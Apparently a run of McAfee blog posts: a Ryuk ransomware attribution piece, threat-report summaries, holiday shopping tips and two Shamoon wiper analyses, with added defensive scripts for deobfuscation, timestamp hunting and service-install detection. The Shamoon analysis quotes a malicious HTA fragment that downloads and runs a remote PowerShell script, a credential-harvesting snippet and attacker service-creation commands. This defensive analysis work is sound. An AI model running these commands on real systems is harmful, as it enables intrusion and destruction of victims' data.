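    return m.group(1).decode("latin-1") if m else None


def cluster(samples):
    """Group samples sharing a Rich key and PDB path; compile times are kept alongside."""
    groups = {}
    for name, data in samples.items():
        rich = parse_rich(data)
        fingerprint = (rich["key"] if rich else None, pdb_path(data))
        groups.setdefault(fingerprint, []).append((name, compile_time(data)))
    return groups


if __name__ == "__main__":
    entries = [(0x010559F2, 12), (0x010459F2, 3), (0x01010000, 1)]  # constructed comp ids
    pdb = r"C:\build\example\Release\example.pdb"                    # constructed path
    samples = {"aug": build_sample(entries, 1533900000, pdb),
               "dec": build_sample(entries, 1544800000, pdb),
               "other": build_sample(entries[:2], 1544800000, pdb)}
    for (key, path), members in cluster(samples).items():
        print(f"rich_key=0x{key:08x} pdb={path}: {members}")
```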

From a call-flow perspective, we notice the similarities and evolution of the code:

The Hermes 2.1 ransomware kit, renamed and redistributed as Ryuk.

The author and seller of Hermes 2.1 emphasizes that what he is selling is a kit and not a service. This suggests that a buyer of the kit must do some fine tuning by setting up a distribution method (spam, exploit kit, or RDP, for example) and infrastructure to make Hermes work effectively. If changing the name and ransom note are part of these tuning options, then it is likely that Ryuk is an altered version of Hermes 2.1.

Attribution: analyzing competing hypotheses

In the race to determine who is behind an attack, research facts (the What and How questions) are often put aside to focus on attribution (the Who question). Who did it? This pursuit is understandable yet fundamentally flawed. Attribution is crucial, but there will always be unanswered questions. Our approach focuses on answering the What and How questions by analyzing the malware, the infrastructure involved, and the incident response performed at the victim’s site.

Our approach is always to analyze competing hypotheses. When investigating an incident, we form several views and compare all the artifacts to support these hypotheses. We try not only to seek verifying evidence but also actively try to find evidence that falsifies a hypothesis. Keeping our eyes open for falsifying facts and constantly questioning our results are essential steps to avoid confirmation bias. By following this method, we find the strongest hypothesis is not the one with the most verifying evidence, but the one with the least falsifying evidence.

Examining competing hypotheses is a scientific approach to investigating cyber incidents. It may not help with the race to attribution, but it ensures the output is based on available evidence.

The most likely hypothesis in the Ryuk case is that of a cybercrime operation developed from a tool kit offered by a Russian-speaking actor. From the evidence, we see sample similarities over the past several months that indicate a tool kit is being used. The actors have targeted several sectors and have asked a high ransom, 500 Bitcoin. Who is responsible? We do not know. But we do know how the malware works, how the attackers operate, and how to detect the threat. That analysis is essential because it allows us to serve our customers.

The post Ryuk Ransomware Attack: Rush to Attribution Misses the Point appeared first on McAfee Blogs.

The Results Are In: Fake Apps and Banking Trojans Are A Cybercriminal Favorite

Today, we are all pretty reliant on our mobile technology. From texting, to voice messaging, to mobile banking, we have a world of possibilities at our fingertips. But what happens when the bad guys take advantage of our reliance on mobile and IoT technology to threaten our cybersecurity? According to the latest McAfee Labs Threats Report, cybercriminals are leveraging fake apps and banking trojans to access users’ personal and financial information. In fact, our researchers saw an average of 480 new threats per minute and a sharp increase in malware targeting IoT devices during the last quarter. Let’s take a look at how these cyberthreats gained traction over the past few months.

While new mobile malware declined by 24% in Q3, our researchers did notice some unusual threats fueled by fake apps. Back in June, we observed a scam where crooks released YouTube videos with fake links disguised as leaked versions of Fortnite’s Android app. If a user clicked on the link to download this phony app, they would be asked to provide mobile verification. This verification process would prompt them to download app after app, putting money right in the cybercriminals’ pockets for increased app downloads.

Another fake app scheme that caught the attention of our researchers was Android/TimpDoor. This SMS phishing campaign tricked users into clicking on a link sent to them via text. The link would direct them to a fabricated web page urging them to download a fake voice messaging app. Once the victim downloaded the fake app, the malware would begin to collect the user’s device information. Android/TimpDoor would then be able to let cybercriminals use the victim’s device to access their home network.

Our researchers also observed some peculiar behavior among banking trojans, a type of malware that disguises itself as a genuine app or software to obtain a user’s banking credentials. In Q3, cybercriminals employed uncommon file types to carry out spam email campaigns, accounting for nearly 500,000 emails sent worldwide. These malicious phishing campaigns used phrases such as “please confirm” or “payment” in the subject line to manipulate users into thinking the emails were of high importance. If a user clicked on the message, the banking malware would be able to bypass the email protection system and infect the device. Banking trojans were also found using two-factor operations in web injects, or packages that can remove web page elements and prevent a user from seeing a security alert. Because these web injects removed the need for two-factor authentication, cybercriminals could easily access a victim’s banking credentials from right under their noses.

But don’t worry – there’s good news. By reflecting on the evolving landscape of cybersecurity, we can better prepare ourselves for potential threats. Therefore, to prepare your devices for schemes such as these, follow these tips:

  • Go directly to the source. Websites like YouTube are often prone to links for fake websites and apps so criminals can make money off of downloads. Avoid falling victim to these frauds and only download software straight from a company’s home page.
  • Click with caution. Only click on links in text messages that are from trusted sources. If you receive a text message from an unknown sender, stay cautious and avoid interacting with the message.
  • Use comprehensive security. Whether you’re using a mobile banking app on your phone or browsing the internet on your desktop, it’s important to safeguard all of your devices with an extra layer of security. Use a robust security software like McAfee Total Protection so you can connect with confidence.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Results Are In: Fake Apps and Banking Trojans Are A Cybercriminal Favorite appeared first on McAfee Blogs.

Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems

Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon “wiper” malware attacks that struck several companies in the Middle East and Europe. In that analysis we discussed one difference to previous Shamoon campaigns. The latest version has a modular approach that allows the wiper to be used as a standalone threat.

After further analysis of the three versions of Shamoon and based on the evidence we describe here, we conclude that the Iranian hacker group APT33—or a group masquerading as APT33—is likely responsible for these attacks.

In the Shamoon attacks of 2016–2017, the adversaries used both the Shamoon Version 2 wiper and the wiper Stonedrill. In the 2018 attacks, we find the Shamoon Version 3 wiper as well as the wiper Filerase, first mentioned by Symantec.

These new wiper samples (Filerase) differ from the Shamoon Version 3, which we analyzed last week. The latest Shamoon appears to be part of a toolkit with several modules. We identified the following modules:

  • OCLC.exe: Used to read a list of targeted computers created by the attackers. This tool is responsible for running the second tool, spreader.exe, with the list of targeted machines.
  • Spreader.exe: Used to spread the file eraser in each machine previously set. It also gets information about the OS version.
  • SpreaderPsexec.exe: Similar to spreader.exe but uses psexec.exe to remotely execute the wiper.
  • SlHost.exe: The new wiper, which browses the targeted system and deletes every file.

The attackers have essentially packaged an old version (V2) of Shamoon with an unsophisticated toolkit coded in .Net. This suggests that multiple developers have been involved in preparing the malware for this latest wave of attacks. In our last post, we observed that Shamoon is a modular wiper that can be used by other groups. With these recent attacks, this supposition seems to be confirmed. We have learned that the adversaries prepared months in advance for this attack, with the wiper execution as the goal.

This post provides additional insight about the attack and a detailed analysis of the .Net tool kit.

Geopolitical context

The motivation behind the attack is still unclear. Shamoon Version 1 attacked just two targets in the Middle East. Shamoon Version 2 attacked multiple targets in Saudi Arabia. Version 3 went after companies in the Middle East by using their suppliers in Europe, in a supply chain attack.

Inside the .Net wiper, we discovered the following ASCII art:

These characters resemble the Arabic text تَبَّتْ يَدَا أَبِي لَهَبٍ وَتَبَّ. This is a phrase from the Quran (Surah Masad, Ayat 1 [111:1]) that means “perish the hands of the Father of flame” or “the power of Abu Lahab will perish, and he will perish.” What does this mean in the context of a cyber campaign targeting energy industries in the Middle East?

Overview of the attack


How did the malware get onto the victim’s network?

We received intelligence that the adversaries had created websites closely resembling legitimate domains which carry job offerings. For example:

  • Hxxp://

Many of the URLs we discovered were related to the energy sector, operating mostly in the Middle East. Some of these sites contained malicious HTML application files that execute other payloads. Other sites lured victims to log in using their corporate credentials. According to our telemetry, this preliminary attack to gather these credentials seems to have started by the end of August 2018.

A code example from one malicious HTML application file:

YjDrMeQhBOsJZ = "WS"
wcpRKUHoZNcZpzPzhnJw = "crip"
RulsTzxTrzYD = "t.Sh"
MPETWYrrRvxsCx = "ell"
PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx)
OoOVRmsXUQhNqZJTPOlkymqzsA=new ActiveXObject(PCaETQQJwQXVJ)

zhKokjoiBdFhTLiGUQD = "d.e"
KoORGlpnUicmMHtWdpkRwmXeQN = "xe"
KoORGlpnUicmMHtWdp = "."
KoORGlicmMHtWdp = "('*****.ps1')'%windir%\\System32\\' + FKeRGlzVvDMH + ' /c powershell -w 1 IEX (New-Object Net.WebClient)'+KoORGlpnUicmMHtWdp+'downloadstring'+KoORGlicmMHtWdp)'%windir%\\System32\\' + FKeRGlzVvDMH + ' /c powershell -window hidden -enc

The preceding script opens a command shell on the victim’s machine and downloads a PowerShell script from an external location. From another location, it loads a second file to execute.
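An added example (not part of the original post) of how an analyst can undo the string splitting the HTA uses to hide “WScript.Shell”: a small static resolver for assignments of the form NAME = "literal" and NAME = (a + b + c). The sample script is constructed from the fragment above; the variable aPrefix and the value “cmd.exe” for FKeRGlzVvDMH are assumptions, since its assignment is not shown on the page.

```python
import re

# One assignment per line, as in the HTA on the page: NAME = <expr>
ASSIGN_RE = re.compile(r"^\s*(?:var\s+)?([A-Za-z_$][\w$]*)\s*=\s*(.+?)\s*;?\s*$")
# A quoted string literal; curly quotes are accepted because extraction often leaves them.
STR_RE = re.compile(r"^[\"'\u201c\u201d\u2018\u2019](.*)[\"'\u201c\u201d\u2018\u2019]$")
ACTIVEX_RE = re.compile(r"new\s+ActiveXObject\s*\(\s*(.+?)\s*\)")

# COM ProgIDs whose creation from an HTML application is worth flagging.
SUSPICIOUS_PROGIDS = {"wscript.shell", "shell.application", "scripting.filesystemobject",
                      "msxml2.xmlhttp", "msxml2.serverxmlhttp"}


def resolve(expr, env):
    """Statically evaluate a '+' chain of string literals and already-seen variables.

    Returns None when any operand is neither a literal nor a known variable
    (this toy resolver does not handle '+' inside literals or function calls).
    """
    expr = expr.strip()
    if expr.startswith("(") and expr.endswith(")"):
        expr = expr[1:-1]
    pieces = []
    for operand in (p.strip() for p in expr.split("+")):
        lit = STR_RE.match(operand)
        if lit:
            pieces.append(lit.group(1))
        elif operand in env:
            pieces.append(env[operand])
        else:
            return None
    return "".join(pieces)


def deobfuscate(script):
    """Return (resolved variables, ProgIDs passed to new ActiveXObject) for a script."""
    env, progids = {}, []
    for line in script.splitlines():
        ax = ACTIVEX_RE.search(line)
        if ax:
            value = resolve(ax.group(1), env)
            progids.append(value if value is not None else "<unresolved>")
            continue
        m = ASSIGN_RE.match(line)
        if m:
            value = resolve(m.group(2), env)
            if value is not None:
                env[m.group(1)] = value
    return env, progids


def verdict(script):
    """Suspicious ProgIDs the script instantiates, recovered through its string splitting."""
    _, progids = deobfuscate(script)
    return sorted(p for p in progids if p.lower() in SUSPICIOUS_PROGIDS)


# Constructed sample mirroring the fragment on the page; aPrefix and the
# resulting "cmd.exe" are assumptions, the page does not show that assignment.
SAMPLE_HTA = """
YjDrMeQhBOsJZ = "WS"
wcpRKUHoZNcZpzPzhnJw = "crip"
RulsTzxTrzYD = "t.Sh"
MPETWYrrRvxsCx = "ell"
PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx)
OoOVRmsXUQhNqZJTPOlkymqzsA = new ActiveXObject(PCaETQQJwQXVJ)
aPrefix = "cm"
zhKokjoiBdFhTLiGUQD = "d.e"
KoORGlpnUicmMHtWdpkRwmXeQN = "xe"
FKeRGlzVvDMH = (aPrefix + zhKokjoiBdFhTLiGUQD + KoORGlpnUicmMHtWdpkRwmXeQN)
"""

if __name__ == "__main__":
    env, progids = deobfuscate(SAMPLE_HTA)
    print("resolved:", {k: v for k, v in env.items() if len(v) > 3})
    print("ActiveX objects created:", progids)
    print("flagged:", verdict(SAMPLE_HTA))
```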

We discovered one of the PowerShell scripts. Part of the code shows they were harvesting usernames, passwords, and domains:

function primer {
if ($env:username -eq "$($env:computername)$"){$u="NT AUTHORITY\SYSTEM"}else{$u=$env:username}

With legitimate credentials to a network it is easy to login and spread the wipers.

.Net tool kit

The new wave of Shamoon is accompanied by a .Net tool kit that spreads Shamoon Version 3 and the wiper Filerase.

This first component (OCLC.exe) reads two text files stored in two local directories. Directories “shutter” and “light” contain a list of targeted machines.

OCLC.exe starts a new hidden command window process to run the second component, spreader.exe, which spreads the Shamoon variant and Filerase with the concatenated text file as parameter.

The spreader component takes as a parameter the text file that contains the list of targeted machines and the Windows version. It first checks the Windows version of the targeted computers.

The spreader places the executable files (Shamoon and Filerase) into the folder Net2.

It creates a folder on remote computers: C:\\Windows\System32\Program Files\Internet Explorer\Signing.

The spreader copies the executables into that directory.

It runs the executables on the remote machine by creating a batch file in the administrative share \\RemoteMachine\admin$\\process.bat. This file contains the path of the executables. The spreader then sets up the privileges to run the batch file.

If anything fails, the malware creates the text file NotFound.txt, which contains the name of the machine and the OS version. This can be used by the attackers to track any issues in the spreading process.

The following screenshot shows the “execute” function:

If the executable files are not present in the folder Net2, it checks the folders “all” and Net4.

To spread the wipers, the attackers included an additional spreader using Psexec.exe, an administration tool used to remotely execute commands.

The only difference is that this spreader uses psexec, which is supposed to be stored in Net2 on the spreading machine. It could be used on additional machines to move the malware further.

The wiper contains three options:

  • SilentMode: Runs the wiper without any output.
  • BypassAcl: Escalates privileges. It is always enabled.
  • PrintStackTrace: Tracks the number of folders and files erased.

The BypassAcl option is always “true” even if the option is not specified. It enables the following privileges:

  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeTakeOwnershipPrivilege
  • SeSecurityPrivilege

To find a file to erase, the malware uses function GetFullPath to get all paths.

It erases each folder and file.

The malware browses every file in every folder on the system.

To erase all files and folders, it first removes the “read only” attributes to overwrite them.

It changes the creation, write, and access date and time to 01/01/3000 at 12:01:01 for each file.

The malware rewrites each file two times with random strings.

It starts to delete the files using the API CreateFile with the ACCESS_MASK DELETE flag.

Then it uses FILE_DISPOSITION_INFORMATION to delete the files.

The function ProcessTracker has been coded to track the destruction.


In the 2017 wave of Shamoon attacks, we saw two wipers; we see a similar feature in the December 2018 attacks. Using the “tool kit” approach, the attackers can spread the wiper module through the victims’ networks. The wiper is not obfuscated and is written in .Net code, unlike the Shamoon Version 3 code, which is encrypted to mask its hidden features.

Attributing this attack is difficult because we do not have all the pieces of the puzzle. We do see that this attack is in line with the Shamoon Version 2 techniques. Political statements have been a part of every Shamoon attack. In Version 1, the image of a burning American flag was used to overwrite the files. In Version 2, the picture of a drowned Syrian boy was used, with a hint of Yemeni Arabic, referring to the conflicts in Syria and Yemen. Now we see a verse from the Quran, which might indicate that the adversary is related to another Middle Eastern conflict and wants to make a statement.

When we look at the tools, techniques, and procedures used during the multiple waves, and by matching the domains and tools used (as FireEye described in its report), we conclude that APT33 or a group attempting to appear to be APT33 is behind these attacks.

The files we detected during this incident are covered by the following signatures:

  • Trojan-Wiper
  • RDN/Generic.dx
  • RDN/Ransom

Indicators of compromise


  • OCLC.exe: d9e52663715902e9ec51a7dd2fea5241c9714976e9541c02df66d1a42a3a7d2a
  • Spreader.exe: 35ceb84403efa728950d2cc8acb571c61d3a90decaf8b1f2979eaf13811c146b
  • SpreaderPsexec.exe: 2ABC567B505D0678954603DCB13C438B8F44092CFE3F15713148CA459D41C63F
  • Slhost.exe: 5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a

File paths and filenames

  • C:\net2\
  • C:\all\
  • C:\net4\
  • C:\windows\system32\
  • C:\\Windows\System32\Program Files\Internet Explorer\Signing
  • \\admin$\process.bat
  • NothingFound.txt
  • MaintenaceSrv32.exe
  • MaintenaceSrv64.exe
  • SlHost.exe
  • OCLC.exe
  • Spreader.exe
  • SpreaderPsexec.exe

Some command lines

  • cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat
  • cmd.exe /c “ping -n 30 >nul && sc config MaintenaceSrv binpath= C:\windows\system32\MaintenaceSrv64.exe LocalService” && ping -n 10 >nul && sc start MaintenaceSrv
  • MaintenaceSrv32.exe LocalService
  • cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat ” “
  • MaintenaceSrv32.exe service


The post Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems appeared first on McAfee Blogs.

McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats

The McAfee Advanced Threat Research team today published the McAfee® Labs Threats Report, December 2018. In this edition, we highlight the notable investigative research and trends in threats statistics and observations gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q3 of 2018.

We are very excited to present to you new insights and a new format in this report. We are dedicated to listening to our customers to determine what you find important and how we can add value. In recent months we have gathered more threat intelligence, correlating and analyzing data to provide more useful insights into what is happening in the evolving threat landscape. McAfee is collaborating closely with MITRE Corporation in extending the techniques of its MITRE ATT&CK™ knowledge base, and we now include the model in our report. We are always working to refine our process and reports. You can expect more from us, and we welcome your feedback.

As we dissect the threat landscape for Q3, some noticeable statistics jump out of the report. In particular, the continued rise in cryptojacking, which has emerged unexpectedly over the course of a year. In Q3 the growth of coin miner malware returned to unprecedented levels after a temporary slowdown in Q2.

Our analysis of recent threats included one notable introduction in a disturbing category. In Q3 we saw two new exploit kits: Fallout and Underminer. Fallout almost certainly had a bearing on the spread of GandCrab, the leading ransomware. Five years ago we published the report “Cybercrime Exposed,” which detailed the rise of cybercrime as a service. Exploit kits are the epitome of this economy, affording anyone the opportunity to easily and cheaply enter the digital crime business.

New malware samples jumped up again in Q3 after a decline during the last two quarters. Although the upward trend applies to almost every category, we did measure a decline in new mobile malware samples following three quarters of continual growth.

This post is only a small snapshot of the comprehensive analysis provided in the December Threats Report. We hope you enjoy the new format, and we welcome your feedback.

The post McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats appeared first on McAfee Blogs.

Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white Northface winter coat for my teenage daughter, which she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wishlist that year.

After fighting the crowds and scouring the stores to no avail, I went online, stressed and exhausted with my credit card in hand looking for a deal and a Christmas delivery guarantee.

Mistake #1: I was under pressure and cutting it way too close to Christmas.
Mistake #2: I was stressed and exhausted.
Mistake #3: I was adamant about getting the best deal.

Gimme a deal!

It turns out these mistakes created the perfect storm for a scam. I found a site with several name-brand coats available at lower prices. I was thrilled to find the exact white coat and guaranteed delivery by Christmas. The cyber elves were working on my behalf for sure!

Only the coat never came and I was out $150.

In my haste and exhaustion, I overlooked a few key things about this “amazing” site that played into the scam. (I won’t harp on the part about me calling customer service a dozen times, writing as many emails, and feeling incredibly stupid over my careless clicking!)

Stress = Digital Risk

I’m not alone in my holiday behaviors it seems. A recent McAfee survey, Stressed Holiday Online Shopping, reveals, unfortunately, that when it comes to online shopping, consumers are often more concerned about finding a deal online than they are with protecting their cybersecurity in the process. 

Here are the kinds of risks stressed consumers are willing to take to get a holiday deal online:

  • 53% think the financial stress of the holidays can lead to careless shopping online.
  • 56% said that they would use a website they were unfamiliar with if it meant they would save money.
  • 51% said they would purchase an item from an untrusted online retailer to get a good deal.
  • 31% would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.
  • When it comes to sharing personal information to get a good deal: 39% said they would risk sharing their email address, 25% would wager their phone number, and 16% would provide their home address.

3 Tips to Safer Online Shopping:

  • Connect with caution. Using public Wi-Fi might seem like a good idea at the moment, but you could be exposing your personal information or credit card details to cybercriminals eavesdropping on the unsecured network. If public Wi-Fi must be used to conduct transactions, use a virtual private network (VPN) to help ensure a secure connection.
  • Slow down and think before you click. Don’t be like me, exhausted and desperate while shopping online — think before you click! Cybercriminals love to target victims by using phishing emails disguised as holiday savings or shipping notifications to lure consumers into clicking links that could lead to malware, or to a phony website designed to steal personal information. Check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use comprehensive security protection that can help protect devices against malware, phishing attacks, and other threats. Protect your personal information by using a home solution that keeps your identity and financial information secure.
  • Take a nap, stay aware. This may not seem like an important cybersecurity move, but during the holiday rush, stress and exhaustion can wear you down and contribute to poor decision-making online. Outsmarting the cybercrooks means awareness and staying ahead of the threats.

I learned the hard way that holiday stress and shopping do not mix and can easily compromise my online security. I lost $150 that day and I put my credit card information (promptly changed) firmly into a crook’s hands. I hope by reading this, I can help you save far more than that.

Here’s wishing you and your family the Happiest of Holidays! May all your online shopping be merry, bright, and secure from all those pesky digital Grinches!

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.

Shamoon Returns to Wipe Systems in Middle East, Europe

Destructive malware has been employed by adversaries for years. Usually such attacks are carefully targeted and can be motivated by ideology, politics, or even financial aims.

Destructive attacks have a critical impact on businesses, causing the loss of data or crippling business operations. When a company is impacted, the damage can be significant. Restoration can take weeks or months, while resulting in unprofitability and diminished reputation.

Recent attacks have demonstrated how big the damage can be. Last year NotPetya affected several companies around the world. Last February, researchers uncovered OlympicDestroyer, which affected the Olympic Games organization.

Shamoon is destructive malware that McAfee has been monitoring since its appearance. The most recent wave struck early this month when the McAfee Foundstone Emergency Incident Response team reacted to a customer’s breach and identified the latest variant. Shamoon hit oil and gas companies in the Middle East in 2012 and resurfaced in 2016 targeting the same industry. This threat is critical for businesses; we recommend taking appropriate actions to defend your organizations.

During the past week, we have observed a new variant attacking several sectors, including oil, gas, energy, telecom, and government organizations in the Middle East and southern Europe.

Similar to the previous wave, Shamoon Version 3 uses several mechanisms as evasion techniques to bypass security as well as to circumvent analysis and achieve its ends. However, its overall behavior remains the same as in previous versions, rendering detection straightforward for most antimalware engines.

As in previous variants, Shamoon Version 3 installs a malicious service that runs the wiper component. Once the wiper is running, it overwrites all files with random rubbish and triggers a reboot, resulting in a “blue screen of death” or a driver error and making the system inoperable. The variant can also enumerate the local network, but in this case does nothing with that information. This variant has some bugs, suggesting the possibility that this version is a beta or test phase.

The main differences from earlier versions are the name list used to drop the malicious file and the fabricated service name MaintenaceSrv (with “maintenance” misspelled). The wiping component has also been designed to target all files on the system with these options:

  • Overwrite file with garbage data (used in this version and the samples we analyzed)
  • Overwrite with a file (used in Shamoon Versions 1 and 2)
  • Encrypt the files and master boot record (not used in this version)

Shamoon is modular malware: The wiper component can be reused as a standalone file and weaponized in other attacks, making this threat a high risk. The post presents our findings, including a detailed analysis and indicators of compromise.


Shamoon is a dropper that carries three resources. The dropper is responsible for collecting data as well as embedding evasion techniques such as obfuscation, antidebugging, or antiforensic tricks. The dropper requires an argument to run.

It decrypts the three resources and installs them on the system in the %System% folder. It also creates the service MaintenaceSrv, which runs the wiper. The typo in the service name eases detection.

The Advanced Threat Research team has watched this service evolve over the years. The following tables highlight the differences:

The wiper uses ElRawDisk.sys to access the user’s raw disk and overwrites all data in all folders and disk sectors, causing a critical state of the infected machine before it finally reboots.

The result is either a blue screen or driver error that renders the machine unusable.

Executable summary

The dropper contains other malicious components masked as encrypted files embedded in a PE section.

These resources are decrypted by the dropper and contain:

  • MNU: The communication module
  • LNG: The wiper component
  • PIC: The 64-bit version of the dropper

Shamoon 2018 needs an argument to run and infect machines. It decrypts several strings in memory that gather information on the system and determine whether to drop the 32-bit or 64-bit version.

It also drops the file (MD5: 41f8cd9ac3fb6b1771177e5770537518) in the folder c:\Windows\Temp\

The malware decrypts two files used later:

  • C:\Windows\inf\mdmnis5tQ1.pnf
  • C:\Windows\inf\averbh_noav.pnf

Shamoon enables the service RemoteRegistry, which allows a program to remotely modify the registry. It also disables remote user account control by enabling the registry key LocalAccountTokenFilterPolicy.

The malware checks whether the following shares exist to copy itself and spread:

  • ADMIN$

Shamoon queries the service to retrieve specific information related to the LocalService account.

It then retrieves the resources within the PE file to drop the components. Finding the location of the resource:

Shamoon creates the file and sets the time to August 2012 as an antiforensic trick. It puts this date on any file it can destroy.

The modification time can be used as an antiforensic trick to bypass detection based on the timeline, for example. We also observed that in some cases the date is briefly modified on the system, faking the date of each file. The files dropped on the system are stored in C:\Windows\System32\.
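An added hunting script (not McAfee's code) for the two timestamp tricks described in these posts: the December 2018 tool-kit wiper's 01/01/3000 12:01:01 stamp and Shamoon Version 3's August 2012 stamp. The August 2012 window, the sample records and the "unconvertible timestamp" lead are assumptions of this script.

```python
"""Hunt for the timestomping described in the two Shamoon analyses.

Added example, not McAfee's code. It flags two stamps named above:
  * the December 2018 tool-kit wiper sets creation, write and access
    time to 01/01/3000 12:01:01 on every file it processes;
  * Shamoon Version 3 sets the time of files it creates to August 2012.
    The exact day is not given, so the whole month is flagged (an
    assumption of this script).
"""
import os
import sys
from datetime import datetime
from typing import Iterable, Iterator, List, NamedTuple, Optional, Tuple

# Stamp written by the .Net wiper in the December 2018 tool kit.
TOOLKIT_STAMP = datetime(3000, 1, 1, 12, 1, 1)

# Shamoon V3 antiforensic date: any time in August 2012 (assumed window).
V3_WINDOW = (datetime(2012, 8, 1), datetime(2012, 9, 1))

# Reported when a raw stamp is too large for the platform's localtime;
# a far-future stamp can trigger this on some builds, which is itself a lead.
UNCONVERTIBLE = "unconvertible-timestamp"


class FileTimes(NamedTuple):
    path: str
    created: Optional[datetime]
    modified: Optional[datetime]
    accessed: Optional[datetime]


def classify(ft: FileTimes) -> Optional[str]:
    """Return an indicator name if any of the three stamps is suspicious."""
    for stamp in (ft.created, ft.modified, ft.accessed):
        if stamp is None:
            return UNCONVERTIBLE
        if stamp.replace(microsecond=0) == TOOLKIT_STAMP:
            return "shamoon-toolkit-year-3000"
        if V3_WINDOW[0] <= stamp < V3_WINDOW[1]:
            return "shamoon-v3-august-2012"
    return None


def find_timestomped(records: Iterable[FileTimes]) -> List[Tuple[str, str]]:
    """Return (path, indicator) for every record with a suspicious stamp."""
    hits = []
    for ft in records:
        tag = classify(ft)
        if tag is not None:
            hits.append((ft.path, tag))
    return hits


def _to_local(ts: float) -> Optional[datetime]:
    try:
        return datetime.fromtimestamp(ts)
    except (OverflowError, OSError, ValueError):
        return None


def walk_times(root: str) -> Iterator[FileTimes]:
    """Yield FileTimes for every file under root.

    st_ctime is the creation time on Windows; on POSIX it is the inode
    change time, which cannot be set through the file API.
    """
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
            except OSError:
                continue
            yield FileTimes(path, _to_local(st.st_ctime),
                            _to_local(st.st_mtime), _to_local(st.st_atime))


# Constructed sample records standing in for a scan of a wiped host.
SAMPLE = [
    FileTimes(r"C:\Users\alice\report.docx", datetime(3000, 1, 1, 12, 1, 1),
              datetime(3000, 1, 1, 12, 1, 1), datetime(3000, 1, 1, 12, 1, 1)),
    FileTimes(r"C:\Windows\System32\MaintenaceSrv64.exe",
              datetime(2012, 8, 15, 3, 0, 0), datetime(2012, 8, 15, 3, 0, 0),
              datetime(2018, 12, 10, 9, 30, 0)),
    FileTimes(r"C:\Windows\System32\kernel32.dll",
              datetime(2018, 4, 11, 7, 0, 0), datetime(2018, 4, 11, 7, 0, 0),
              datetime(2018, 12, 10, 9, 31, 0)),
    FileTimes(r"C:\Windows\Temp\odd.tmp", None, None, None),
]

if __name__ == "__main__":
    recs = walk_times(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE
    for path, tag in find_timestomped(recs):
        print(f"{tag:28} {path}")
```

Run it with a mounted image or directory as the first argument to walk real files; without an argument it reports on the constructed sample records.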

Before creating the malicious service, Shamoon elevates its privilege by impersonating the token. It first uses LogonUser and ImpersonateLoggedOnUser, then ImpersonateNamedPipeClient. Metasploit uses a similar technique to elevate privileges.

Elevating privileges is critical for malware to perform additional system modifications, which are usually restricted.

Shamoon creates the new malicious service MaintenaceSrv. It creates the service with the option Autostart (StartType: 2) and runs the service with its own process (ServiceType: 0x10):

If the service already exists, it updates the existing service’s configuration with the same parameters.

It finally finishes creating MaintenaceSrv:

The wiper dropped on the system can have any one of the following names:



Next the wiper runs to destroy the data.


The wiper component is dropped into the System32 folder. It takes one parameter to run. The wiper driver is embedded in its resources.

We can see the encrypted resources, 101, in this screenshot:

The resource decrypted is the driver ElRawDisk.sys, which wipes the disk.

Extracting the resource:

The preceding file is not malicious in itself but is considered risky because it is the original driver.

The wiper creates a service to run the driver with the following command:

sc create hdv_725x type= kernel start= demand binpath= WINDOWS\hdv_725x.sys 2>&1 >nul
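Detection logic, added here and not part of McAfee's analysis, over Service Control Manager event 7045 ("A service was installed in the system") records for the two services this post describes: MaintenaceSrv (auto start, own process) and the hdv_725x kernel service created by the command above. The sample log lines and the "normal image path" heuristic are assumptions.

```python
"""Flag Shamoon-style service installs in Windows System log event 7045.

Added example, not McAfee's code. Event 7045 (Service Control Manager,
"A service was installed in the system") records the name, image path,
type and start type of every new service, which covers both services in
the analysis: MaintenaceSrv (auto start, own process) and hdv_725x
(kernel driver, demand start, relative binpath). The sample lines are
constructed to follow that event's field wording, one event per line.
"""
import re
from typing import Dict, List, Optional, Tuple

# Service names from the analysis: the misspelled MaintenaceSrv and the
# hdv_725x kernel service that loads the RawDisk driver.
KNOWN_NAMES = {"maintenacesrv", "hdv_725x"}

# Fields of one 7045 message in template order, flattened onto one line.
EVENT_RE = re.compile(
    r"Service Name:\s*(?P<name>.+?)\s+Service File Name:\s*(?P<image>.+?)"
    r"\s+Service Type:\s*(?P<stype>.+?)\s+Service Start Type:\s*"
    r"(?P<start>.+?)\s+Service Account:\s*(?P<account>.*)$"
)

# Image paths the service controller resolves normally: a drive letter
# (optionally quoted), UNC, \SystemRoot\, \??\ or a System32-relative path.
NORMAL_IMAGE = re.compile(
    r'^(?:"?[a-z]:\\|\\\\|\\systemroot\\|\\\?\?\\|system32\\)', re.I
)


def parse_7045(line: str) -> Optional[Dict[str, str]]:
    m = EVENT_RE.search(line)
    return m.groupdict() if m else None


def assess(ev: Dict[str, str]) -> List[str]:
    """Return the reasons one 7045 record looks like a Shamoon install."""
    reasons = []
    name = ev["name"].strip().lower()
    image = ev["image"].strip().lower()
    if name in KNOWN_NAMES:
        reasons.append("known-shamoon-service-name")
    if not NORMAL_IMAGE.match(image):
        # 'binpath= WINDOWS\hdv_725x.sys' carries no drive or root.
        reasons.append("relative-image-path")
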